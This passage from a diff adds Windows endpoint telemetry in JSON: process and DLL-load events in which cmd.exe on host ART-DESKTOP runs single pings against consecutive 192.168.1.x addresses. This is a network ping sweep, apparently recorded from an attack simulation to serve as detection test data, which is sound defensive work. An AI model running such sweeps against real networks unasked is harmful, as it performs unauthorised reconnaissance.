"timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "process", + 
"pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572511830000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.109", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3052, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + 
"unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572511980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "event_type": "process", + "pid": 3052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572516840000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-00107D995201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.110", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1752, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": 
"{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572516980000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "event_type": "process", + "pid": 1752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572521990000, + "unique_pid": "{42FC7E13-CB83-5C05-0000-0010EF9B5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.111", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5964, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572522130000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" 
+ }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572522140000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "event_type": "process", + "pid": 5964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572526830000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010729E5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.112", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4408, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + 
"pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572526980000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "event_type": "process", + "pid": 4408, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572531840000, + "unique_pid": "{42FC7E13-CB84-5C05-0000-0010E1A05201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.113", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7504, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572531980000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + 
"image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7504, + "process_name": 
"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572531990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "event_type": "process", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572536990000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-00105EA35201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.114", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7652, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", 
+ "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572537140000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "event_type": "process", + "pid": 7652, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572541830000, + "unique_pid": "{42FC7E13-CB85-5C05-0000-0010D1A55201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.115", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7872, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572541980000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572541990000, + "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7872, + "process_name": "PING.EXE", + "process_path": 